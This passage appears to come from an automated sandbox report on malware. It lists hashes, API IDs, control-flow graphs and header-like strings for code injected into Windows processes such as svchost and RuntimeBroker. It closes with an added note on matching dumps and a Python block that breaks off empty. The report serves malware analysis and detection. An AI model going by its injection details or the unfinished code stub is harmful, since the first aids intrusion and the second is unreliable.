• Instruction Fuzzy Hash: F131F772510205BFEF027F709D46ABA3BACEF25300F400565BD85DA0A2EB744DA4CBB5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Memory Dump Source
• Source File: 0000001C.00000002.2888229544.0000000000010000.00000040.00000001.00020000.00000000.sdmp, Offset: 00010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_10000_UserOOBEBroker.jbxd
Similarity
• API ID: Virtual$Protect$Alloc
• String ID:
• API String ID: 2541858876-0
• Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction ID: 9f39b5367da6598aeeb1998e776373a994835cae58933e0181d4283a84448e61
• Instruction Fuzzy Hash: 6021F930B34C1D0BEB5CA27C98597A4F6E2E79C320F940295EA0DD36D4ED58CC8183C6
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000001C.00000002.2888229544.0000000000010000.00000040.00000001.00020000.00000000.sdmp, Offset: 00010000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_10000_UserOOBEBroker.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: 6daea8f8473804d12748bca0b7204fc4a623126665c209879b0ad2024dc0075f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8231B6724142046FEB017BB09D4AAFA7BACEF11310F044165BDC5DA0A7DEB449D5CBB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000001D.00000002.2886726902.0000000000220000.00000040.00000001.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_29_2_220000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: 9213b5a24b7572a0fa8275f44ed011a212179cfb3f58e45071e8f7335106e7b0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: D531E8724202257FEB017FF0ADC6ABA77ACEF11300F040165BD85DA0A7EA744975CAB6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000001E.00000002.2887284163.00000000006E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_30_2_6e0000_dllhost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: 57b2477187417a0fa26d9e778a8692fd47d65f2161f25521c5e1062ca1e8795a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: CD31E5720113846FFF417B719D86ABA37AEEF11300F00016ABD85DE1A6DAB44D95CAB9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000001F.00000002.2886725458.0000000000E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_31_2_e60000_conhost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: 4e65f1ce295fa428a3da672e4fd0ef68577f9fce5ea97a4a2d9caff0e717d1c0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: 543129720802147FEF06BF70AD46ABB37ACEF51380F041165BD85EA0A2EA704D54CBB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000020.00000002.2886409384.0000000000940000.00000040.00000001.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_32_2_940000_RuntimeBroker.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: 3f2886f6ec09ed34d49eaf7711265528a991098f11a0e572295590f38348433f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: C831E672010205AFEB017B709D86FBA3BACEF91300F400165BE85DA1A6EA7549A4CBB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000022.00000002.2422738043.0000000000B00000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_34_2_b00000_RuntimeBroker.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: 738e6db485bacd31c5bfb57b6805020ea59ac34f98071cdae04e4e89ec52c087
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B31C1720203046FEB017B709D86BAA3FECFF11300F4441E6BD85DA0E2EA7449648AB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 286093e-286095f call 2860cc4 call 28614bc call 2863cc0 8 2860967-2860989 0->8 10 2860af1-2860af2 8->10 11 286098f-28609d2 call 28609d9 8->11 15 28609d4-28609d5 11->15 16 2860a3d-2860a76 11->16 18 28609d7-28609e8 call 2863653 15->18 19 2860a3c 15->19 17 2860a7e-2860a80 16->17 20 2860a82-2860aae 17->20 21 2860aec call 2860af3 17->21 18->21 30 28609ee-2860a10 18->30 19->16 20->21 27 2860ab0-2860abc 20->27 21->10 31 2860ac1-2860ae5 27->31 30->21 34 2860a16-2860a3b 30->34 31->10 37 2860ae7-2860aea 31->37 34->21 38 2860a41-2860a76 34->38 37->21 37->31 38->17
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000023.00000002.2921684648.0000000002860000.00000040.00000001.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_2860000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction ID: 666f1d83c93e6e90c6a8e0b59a0915f7aa07f5a7d724b8da872b7f184644d25e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction Fuzzy Hash: CD5192356442549FEB135F20CC89BA97BB8FF04744F0401D9BA49FE0D6DBB09594CA6A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 39 28614bc-28614df call 28614de 42 2861502-2861590 call 2861345 * 6 39->42 43 28614e1-2861500 call 2860c9c 39->43 43->42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000023.00000002.2921684648.0000000002860000.00000040.00000001.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_2860000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
• API String ID:
• Opcode ID: f5727545300d1671addd51e91b40c8cbd905ff098a5558d7618b97e1a8f51269
• Instruction ID: 09242cb909ce05c8386663cc7c04eae06bae2c523b38d4155683a79ddb5cdbc6
• Opcode Fuzzy Hash: f5727545300d1671addd51e91b40c8cbd905ff098a5558d7618b97e1a8f51269
• Instruction Fuzzy Hash: 7521FC764046149EDF03AF60C9CC8A673ECEF40704F49096A9989EF04AFA749154CEE6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 59 2861345-2861352 60 28613eb-28613ec 59->60 61 2861358-286135e 59->61 61->60 62 2861364-286137a 61->62 62->60 64 286137c-286138f 62->64 66 2861391-2861398 64->66 67 286139b-28613ab call 2860e7c 66->67 70 28613ad-28613e2 67->70 70->60
Memory Dump Source
• Source File: 00000023.00000002.2921684648.0000000002860000.00000040.00000001.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2860000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: 81af63b3b150f58c9699f22beb827f2356ba015f504f613eba9638e408418da3
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction Fuzzy Hash: 7F21AE35A04216AFDF119EB8D948B6DBBB5AF04304F098215F959FF695D730A800CB94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 71 28614de-2861590 call 2863653 call 2860c9c call 2861345 * 6
Memory Dump Source
• Source File: 00000023.00000002.2921684648.0000000002860000.00000040.00000001.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2860000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6d5916cffd13119fdbd97c2973cedf6b12916aa16a29f0e56b04471841f1574a
• Instruction ID: 6c4173c30b3f4b94f782e7bfe0c7a4aafbc802248f83db95d1a0019eda0938b0
• Opcode Fuzzy Hash: 6d5916cffd13119fdbd97c2973cedf6b12916aa16a29f0e56b04471841f1574a
• Instruction Fuzzy Hash: F811AD764045149EEF03AF64C5CC8BA73ECEE40704B49096A9D8AEF44AFE749154CFE6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 90 2863f0d-2863f29 call 2863653 call 286379f 95 2863f3b-2863f66 call 2863f78 * 3 90->95 96 2863f2b-2863f39 call 286401b 90->96 109 2863f71 95->109 103 2863f76-2863f77 96->103 109->103 110 2863f71 call 2863f78 109->110 110->103
Memory Dump Source
• Source File: 00000023.00000002.2921684648.0000000002860000.00000040.00000001.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2860000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction ID: 7d740c54ca76b50c5b23a0ddb8058a1065a441b0fe34852c3217d7d543167f75
• Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction Fuzzy Hash: 77F08C3C588640AFFF403BB4AC4D62D32B9AF00B05F0404D0AA8AEE8D0CE3085508E72
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 111 2864674-286468d call 2863a1c 114 286468f-2864698 call 2863a6e 111->114 115 286469d-28646cd 111->115 114->115 118 28647e7-28647ec 115->118 119 28646d3-28646f5 115->119 119->118 121 28646fb-2864720 119->121 123 2864722-2864737 121->123 124 2864738-286475a 121->124 123->124 126 28647bf-28647c9 124->126 127 286475c-286477e 124->127 128 28647e0-28647e5 126->128 129 28647cb-28647dd call 2863673 126->129 127->126 132 2864780-28647a2 127->132 128->118 129->128 132->126 135 28647a4-28647bc 132->135 135->126
Strings
Memory Dump Source
• Source File: 00000023.00000002.2921684648.0000000002860000.00000040.00000001.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2860000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction ID: c64ccaea70287e747866c4c5b566e60deb088b3db4161d02c9eaf71b8488a789
• Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction Fuzzy Hash: FA4164BA500208BFEF125F65CC48BEEBBBAEF80704F154059EA44EA254D7309654CF94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 136 2864675-2864680 137 286468b-286468d 136->137 138 2864686 call 2863a1c 136->138 139 286468f-2864698 call 2863a6e 137->139 140 286469d-28646cd 137->140 138->137 139->140 143 28647e7-28647ec 140->143 144 28646d3-28646f5 140->144 144->143 146 28646fb-2864720 144->146 148 2864722-2864737 146->148 149 2864738-286475a 146->149 148->149 151 28647bf-28647c9 149->151 152 286475c-286477e 149->152 153 28647e0-28647e5 151->153 154 28647cb-28647dd call 2863673 151->154 152->151 157 2864780-28647a2 152->157 153->143 154->153 157->151 160 28647a4-28647bc 157->160 160->151
Strings
Memory Dump Source
• Source File: 00000023.00000002.2921684648.0000000002860000.00000040.00000001.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2860000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction ID: dc2a5234da75354acf6ed9f9fd8035f8988e787324178cb9ea38eb42ed547b26
• Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction Fuzzy Hash: B14152BA500208BFEF225F65CC48BEEBFBAEF84704F154069EA44EA254D734D654CB94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 0 2bb093e-2bb095f call 2bb0cc4 call 2bb14bc call 2bb3cc0 8 2bb0967-2bb0989 0->8 10 2bb098f-2bb09d2 call 2bb09d9 8->10 11 2bb0af1-2bb0af2 8->11 15 2bb0a3d-2bb0a76 10->15 16 2bb09d4-2bb09d5 10->16 17 2bb0a7e-2bb0a80 15->17 18 2bb0a3c 16->18 19 2bb09d7-2bb09e8 call 2bb3653 16->19 21 2bb0aec call 2bb0af3 17->21 22 2bb0a82-2bb0aae 17->22 18->15 19->21 29 2bb09ee-2bb0a10 19->29 21->11 22->21 27 2bb0ab0-2bb0abc 22->27 31 2bb0ac1-2bb0ae5 27->31 29->21 34 2bb0a16-2bb0a3b 29->34 31->11 37 2bb0ae7-2bb0aea 31->37 34->21 38 2bb0a41-2bb0a76 34->38 37->21 37->31 38->17
Memory Dump Source
• Source File: 00000024.00000002.2922946963.0000000002BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_2bb0000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction ID: 3db76c414472a3032659e6335f09e0faf399cb654bdf473c3ee1eaa2d9c4e214
• Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction Fuzzy Hash: 2C51A1315442549FEB236F20CC85BBA7BB8EF05744F0405D9AA49FE0D6DBB09590CA65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 39 2bb14bc-2bb14df call 2bb14de 42 2bb1502-2bb1590 call 2bb1345 * 6 39->42 43 2bb14e1-2bb1500 call 2bb0c9c 39->43 43->42
Memory Dump Source
• Source File: 00000024.00000002.2922946963.0000000002BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_2bb0000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fc032be1761e2e27ec16aa6f47ae36ec6219fc5cd5c4500d68a6f7b1eca660e1
• Instruction ID: d9007e701e61f5467eea8f5aa82ba0010ea1d627fcf27d83ea76a59388daa009
• Opcode Fuzzy Hash: fc032be1761e2e27ec16aa6f47ae36ec6219fc5cd5c4500d68a6f7b1eca660e1
• Instruction Fuzzy Hash: 0421FA72404614AEEF03AF60C9C88E673ECEF40704F4549AA9989EF049FAB09554CEE6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 59 2bb1345-2bb1352 60 2bb13eb-2bb13ec 59->60 61 2bb1358-2bb135e 59->61 61->60 62 2bb1364-2bb137a 61->62 62->60 64 2bb137c-2bb138f 62->64 66 2bb1391-2bb1398 64->66 67 2bb139b-2bb13ab call 2bb0e7c 66->67 70 2bb13ad-2bb13e2 67->70 70->60
Memory Dump Source
• Source File: 00000024.00000002.2922946963.0000000002BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_2bb0000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: 3827e46dd769374e585e7034dbbadc5fa6cb912ff662c6d45e6aba785fd235ca
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction Fuzzy Hash: D2218E31904216AFDF12DE78C844BADBBB5AF04704F058255F959BB594D770A810CBA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 71 2bb14de-2bb1590 call 2bb3653 call 2bb0c9c call 2bb1345 * 6
Memory Dump Source
• Source File: 00000024.00000002.2922946963.0000000002BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_2bb0000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2fe8e250536a2cc792e0f46b2e11c914316ba17fdb804fdedba9ee654a488dd4
• Instruction ID: 56a2a84c558480c29dec51e6ae9fec31b8eadf728de8e8d02fdb99284b22d059
• Opcode Fuzzy Hash: 2fe8e250536a2cc792e0f46b2e11c914316ba17fdb804fdedba9ee654a488dd4
• Instruction Fuzzy Hash: 68117472404614AEEF03AF64C5C88FA73ECEF40708B4549AA9D89EF449FEB09154CEE5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 90 2bb3f0d-2bb3f29 call 2bb3653 call 2bb379f 95 2bb3f3b-2bb3f66 call 2bb3f78 * 3 90->95 96 2bb3f2b-2bb3f39 call 2bb401b 90->96 109 2bb3f71 95->109 103 2bb3f76-2bb3f77 96->103 109->103 110 2bb3f71 call 2bb3f78 109->110 110->103
Memory Dump Source
• Source File: 00000024.00000002.2922946963.0000000002BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_2bb0000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
• Instruction ID: 881ccbb4178d83d91e9f8be86de86ec60904bfc76917cf811f3c849ce409cff5
• Opcode Fuzzy Hash: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
• Instruction Fuzzy Hash: FCF01C70588240EBEF433BB08C4D6ED36F9AF40745F0405D1AA8AAD4D5DEB095508E75
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 136 2bb4675-2bb468d call 2bb3a1c 139 2bb468f-2bb4698 call 2bb3a6e 136->139 140 2bb469d-2bb46cd 136->140 139->140 143 2bb46d3-2bb46f5 140->143 144 2bb47e7-2bb47ec 140->144 143->144 146 2bb46fb-2bb4720 143->146 148 2bb4738-2bb475a 146->148 149 2bb4722-2bb4737 146->149 151 2bb47bf-2bb47c9 148->151 152 2bb475c-2bb477e 148->152 149->148 153 2bb47cb-2bb47dd call 2bb3673 151->153 154 2bb47e0-2bb47e5 151->154 152->151 158 2bb4780-2bb47a2 152->158 153->154 154->144 158->151 160 2bb47a4-2bb47bc 158->160 160->151
Strings
Memory Dump Source
• Source File: 00000024.00000002.2922946963.0000000002BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_2bb0000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction ID: eeae6897e9e5b13bdf0dbc5be080434017d8e70745aec173b7e12ebb64ff84cf
• Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction Fuzzy Hash: F04172B6600208BFEF125F65CC48BEEBFBAFF84704F1540A9EA44AA255D770D640CB94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 111 2bb4674-2bb4680 112 2bb468b-2bb468d 111->112 113 2bb4686 call 2bb3a1c 111->113 114 2bb468f-2bb4698 call 2bb3a6e 112->114 115 2bb469d-2bb46cd 112->115 113->112 114->115 118 2bb46d3-2bb46f5 115->118 119 2bb47e7-2bb47ec 115->119 118->119 121 2bb46fb-2bb4720 118->121 123 2bb4738-2bb475a 121->123 124 2bb4722-2bb4737 121->124 126 2bb47bf-2bb47c9 123->126 127 2bb475c-2bb477e 123->127 124->123 128 2bb47cb-2bb47dd call 2bb3673 126->128 129 2bb47e0-2bb47e5 126->129 127->126 133 2bb4780-2bb47a2 127->133 128->129 129->119 133->126 135 2bb47a4-2bb47bc 133->135 135->126
Strings
Memory Dump Source
• Source File: 00000024.00000002.2922946963.0000000002BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_2bb0000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction ID: cff8848bbac9601d628c63a9cc5d5f078bb8476f2c89e010f1c0faf844853b50
• Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction Fuzzy Hash: 434151B6600208BFEF129F65CC44BEEBBBAFF84704F1540A9EA44AA255D774D640CF94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 0 256093e-256095f call 2560cc4 call 25614bc call 2563cc0 8 2560967-2560989 0->8 10 2560af1-2560af2 8->10 11 256098f-25609d2 call 25609d9 8->11 15 25609d4-25609d5 11->15 16 2560a3d-2560a80 11->16 17 25609d7-25609e8 call 2563653 15->17 18 2560a3c 15->18 21 2560a82-2560aae 16->21 22 2560aec call 2560af3 16->22 17->22 29 25609ee-2560a10 17->29 18->16 21->22 27 2560ab0-2560abc 21->27 22->10 32 2560ac1-2560ae5 27->32 29->22 33 2560a16-2560a3b 29->33 32->10 37 2560ae7-2560aea 32->37 33->18 33->22 37->22 37->32
Memory Dump Source
• Source File: 00000025.00000002.2918581585.0000000002560000.00000040.00000001.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_2560000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction ID: 09dc2333d8d4fcaa15e7f2cf7b12593dbfa056a0ac124d39233c8a60f6178b2f
• Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction Fuzzy Hash: 8B5192315442549FEB125F20CC89BA97BB8FF04744F0401D9BA49FE0D6DBB09594CB69
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 38 25614bc-2561590 call 25614de call 2560c9c call 2561345 * 6
Memory Dump Source
• Source File: 00000025.00000002.2918581585.0000000002560000.00000040.00000001.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_2560000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4e691a712de486e4dfceb288b4c3d9d3fe3d652e5e2e3b2f50e0e601de67137e
• Instruction ID: 810691f4088cfe0eceeb6d2154fe5a906a9c2d4cc68b6b523247cf5125fbdb44
• Opcode Fuzzy Hash: 4e691a712de486e4dfceb288b4c3d9d3fe3d652e5e2e3b2f50e0e601de67137e
• Instruction Fuzzy Hash: 4421FC72404A149EDF03AF60C9C88BA73ECFF80704F45496A9989EF049FA709554CEEA
Uniqueness

Uniqueness Score: -1.00%
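
The two memory dumps in this part of the report (pid 36 at base 02BB0000, pid 37 at base 02560000) contain the same injected code at different bases: the entry for 2bb1345 above and the entry for 2561345 that follows carry the same Opcode ID (e6710b31...73bc76a) but different Instruction IDs and Instruction Fuzzy Hashes, and their control_flow_graph lines describe the same blocks, edges and call target at the same offsets from the dump base. The Python below is an added example, not part of the Joe Sandbox report, that parses the report's control_flow_graph text and compares two graphs by base-relative offset, so such pairs can be matched without relying on the analysis-assigned node ids. The sample lines are copied from the report; the token grammar (block id followed by an address or address range, `call <addr>` and `* <n>` attached to the open block, `<src>-><dst>` edges) is inferred from those lines and is an assumption. It also shows a negative case: the 2bb14de entry in pid 36 and the 25614bc entry in pid 37 do not match, because the pid 37 entry starts 0x22 bytes earlier and has an extra call to 25614de.

```python
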